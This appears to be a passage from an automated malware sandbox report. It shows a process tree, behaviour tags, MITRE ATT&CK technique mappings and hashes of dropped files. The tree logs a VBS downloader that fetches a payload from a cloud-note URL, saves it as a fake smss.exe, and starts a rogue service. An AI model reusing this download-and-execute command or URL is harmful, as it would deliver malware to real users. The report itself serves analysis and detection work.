C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBba2227a56359db179ebf9a924bc233d3?method=download&inline=true&shareKey=89273cb26401400b293be41d8c5cffa5" C:\Windows\Temp\smss.exe3⤵
- Blocklisted process makes network request
PID:5580
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- Runs ping.exe
PID:2240
-
-
C:\Windows\SysWOW64\sc.exesc start Microsarver3⤵
- Launches sc.exe
PID:8204
-
-
C:\Windows\SysWOW64\sc.exesc start Microsarver3⤵PID:8220
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
PID:4016
-
-
C:\windows\Installer\conhost.exeC:\windows\Installer\conhost.exe1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:8084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:8144
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:1404
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44KB
MD5c24315b0585b852110977dacafe6c8c1
SHA1be855cd1bfc1e1446a3390c693f29e2a3007c04e
SHA25615ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
SHA51281032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2
-
Filesize
126KB
MD58c80dd97c37525927c1e549cb59bcbf3
SHA14e80fa7d98c8e87facecdef0fc7de0d957d809e1
SHA25685b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
SHA51250e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e
-
Filesize
7KB
MD5497080fed2000e8b49ee2e97e54036b1
SHA14af3fae881a80355dd09df6e736203c30c4faac5
SHA256756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
SHA5124f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df
-
Filesize
155KB
MD5d2fb01629fa2a994fbd1b18e475c9f23
SHA139b026fcde0f6ae2591ab63b7476536c6b18619c
SHA256ce734596c2b760aa4b3f340227dd9ec48204a96cf0464ad1a97ae648b0a40789
SHA51248f6d6ea57f641d652832aa1a525f381521900a956ff73c5af6a12934a50518e410190c2ab4ae0d05b4d28ec989b7100882095195734245972682b2d701c3a06
-
Filesize
11KB
MD5f0e1fd61d6ca0793945c5d2c815d720a
SHA1f448c03c7f86e4f2d9a74bc5df9ca8d7ef3e0bdf
SHA25615e08164db3d57bc1271dffc7566ff193bc221910308362de964007806c17974
SHA5129630bb4747557cad0c4d8e369d1b7130521370a06c7da327140332589b206ea08839f77b87a4a9b21e2a950716680984792db3e038ea42d493fffb17e34bf722
-
Filesize
43KB
MD54420f8917dc320a78d2ef14136032f69
SHA106cd886586835b2bf0d25fba4c898b69e362ba6d
SHA256b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b
SHA512020f0e42cb26b0ec39fbd381e289466509612307e76a0bfd820247d986e9959fe8e68a1cc41dc2a36f8387c61d88a0b0c900d2a406967ebf5c051ad39b026942
-
Filesize
3.5MB
MD54b0696dacce157b7b8975faa7c3ddc84
SHA11c48eabda846639560754ee8a68a3bb43e49d696
SHA256cb09e395304c6fc7b7e88f7df54034da802021b3080716ad8b661e0bf3da152f
SHA5125a842eab912da69ff89e0acfd6ff9196e43a2f3964f70c92b76f7c6c439077cd895aa0374b8b76eff58288454e9dd9114ca60567bcea783ddc1b41467a715e5c
-
Filesize
15KB
MD53c2fe2dbdf09cfa869344fdb53307cb2
SHA1b67a8475e6076a24066b7cb6b36d307244bb741f
SHA2560439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
SHA512d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c
-
Filesize
10KB
MD5ba629216db6cf7c0c720054b0c9a13f3
SHA137bb800b2bb812d4430e2510f14b5b717099abaa
SHA25615292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
SHA512c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9
-
Filesize
807KB
MD59a5cec05e9c158cbc51cdc972693363d
SHA1ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
SHA256aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
SHA5128af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94
-
Filesize
11KB
MD52f0a52ce4f445c6e656ecebbcaceade5
SHA135493e06b0b2cdab2211c0fc02286f45d5e2606d
SHA256cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
SHA51288151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1
-
Filesize
232KB
MD5f0881d5a7f75389deba3eff3f4df09ac
SHA18404f2776fa8f7f8eaffb7a1859c19b0817b147a
SHA256ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
SHA512f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e
-
Filesize
58KB
MD5838ceb02081ac27de43da56bec20fc76
SHA1972ab587cdb63c8263eb977f10977fd7d27ecf7b
SHA2560259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
SHA512bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22
-
Filesize
29KB
MD53e89c56056e5525bf4d9e52b28fbbca7
SHA108f93ab25190a44c4e29bee5e8aacecc90dab80c
SHA256b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
SHA51232487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6
-
Filesize
9KB
MD583076104ae977d850d1e015704e5730a
SHA1776e7079734bc4817e3af0049f42524404a55310
SHA256cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
SHA512bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8
-
Filesize
57KB
MD56b7276e4aa7a1e50735d2f6923b40de4
SHA1db8603ac6cac7eb3690f67af7b8d081aa9ce3075
SHA256f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
SHA51258e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa
-
Filesize
257B
MD5f1d7bc201440a31aa69e506c2debcde1
SHA11ae645aca7335db68d883576ae7e92b4334fda27
SHA256dda4eefaed660fa7127cf2bdb39707ad4aa740ce75d1c0736ebcf0ea2e93d0c9
SHA512c35577ca7f5144c688e288ad95820ee18ff2694370e4d51b9461ee3baf3716c00aa443730fa8399b64b061f97c63be4bcd5c36d220e897b4d3a6dac1c07d267c
-
Filesize
319B
MD56521a92292ce620a276fc7209dc016de
SHA1d982e10dfa51b0f4c65a713cb85e25c29e28aa5f
SHA256656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288
SHA5123307e8f27639a51ee890434b81333cf5b8b7a0bb889fe007f3e8d70fe96130ad07bc9d9e3667f282ed1c1feafb907d2dfe13ad456060d47c6f644f5539d31855
-
Filesize
3.7MB
MD58b6dcfc38e8a375d3dc41cbef600d82f
SHA11fc76f6f5e685c9addbb90258f1c9203733dd24d
SHA2561e2749471f31a802f45f4fb1d4a7f2d2fb2be16ce5234e1ef5685518941a103a
SHA512f2614ab61eaf56f3c3069abbc989d3314e781e5cef9be14cf045fd671691686ffdba2303c7cce99315dc94ad79bf97a245a190f7c9aab4a111a5f352aa717937
-
Filesize
223B
MD5bf36b8897e47ceb211565919941f0a7a
SHA13dfcde99eaa5dd6584f89a5e24237f7b9a9d5e54
SHA2568bcbc405bb944d4e50057f8d6678c97275f7a523ac1d49272ccc9df69beaf3fc
SHA512732c9b9df3dc305d66ac47ce29aa50856a754cc230594d7c5bab65d472315f1e422ca5d06f7e922145b82071f105d4b84dfdb72d5ec3206ccd278d5b6f765e94
-
Filesize
223B
MD5aaaaaa19579c18777061c85025e77c95
SHA16ddaa33b400c75f102651737036cdf1be2887318
SHA2560ba2f5bc07176333df3cfc7df6245c01cbcce6524083f03e6213512b15ea1d50
SHA5125657c0a98286b50354a1794e6cd6e0ee21829d47c7488b87cba74c06e236591ea647f9c23e666619b4c17ac9261096a6e764d5f83116d5a111545aae6d966933
-
Filesize
223B
MD5220074d726b09ba7a1f31aa7b5aec55c
SHA183d99641171d1033ac29cd4b7e3071bd64a1d6a4
SHA256a8a9698edacd5c42c94a3e25dda7c724ed01324454880602166bd396955d5616
SHA512a966f1e83e5ac778c9a809bebc73eeb8a4dcf86c05730d8b59514607acd51b16e647ef75e874e150e439fbd6b1acf90ef2033a3af21b3fdbedf89a6b7b44e159
-
Filesize
21B
MD52ddca716eff6ab2f8d96dc3d39527386
SHA14c1c65fa4d6bffe17dc9e04e193adf6db9d0994f
SHA256e0802313e50e2b94580ac045356ea9cbd88106bede5525634964412a7811f52a
SHA5125b2a2f43e431d9637a87726b387819f00c9b3fa4ea7371e844dcdaeb424c32d5ab0106663d0d3f0e17a06d5890303cced8a625d06d04cbf657b6e3de207eb8e3
-
Filesize
24KB
MD5de55a297980c139d8df904d8dc45b6d9
SHA159a1cb27ed00131f113bd02c7e26e5a09a3e3bcd
SHA256e3a8b253202ed4034fe0365f9e7328036ba012951f5de1bddd5072d2b929bd95
SHA512a28e3f839a95715d9cccad1d0b26638fc5ddfd834cc39885211312009af999be2430770a32e8db4a337d201d06d5c682b47af314cdc0e6d62a436771fd964af6
-
Filesize
6KB
MD5e32fe1a70bf390f67a1b3b9574112833
SHA1aaff28a5144b7e72c8243feb2d2a6942054db411
SHA256806d812fc9076b3a39a7bf39065e1b08855ebd546233ac653ffa94449119d9cb
SHA512e3e0295c65314005577439b278a1e70b8263748d2936840ecfb809d7eb1c87a2ef2c729da979596ca0803e98a7a595e9787f7439eafef03663c33eee3bee7f33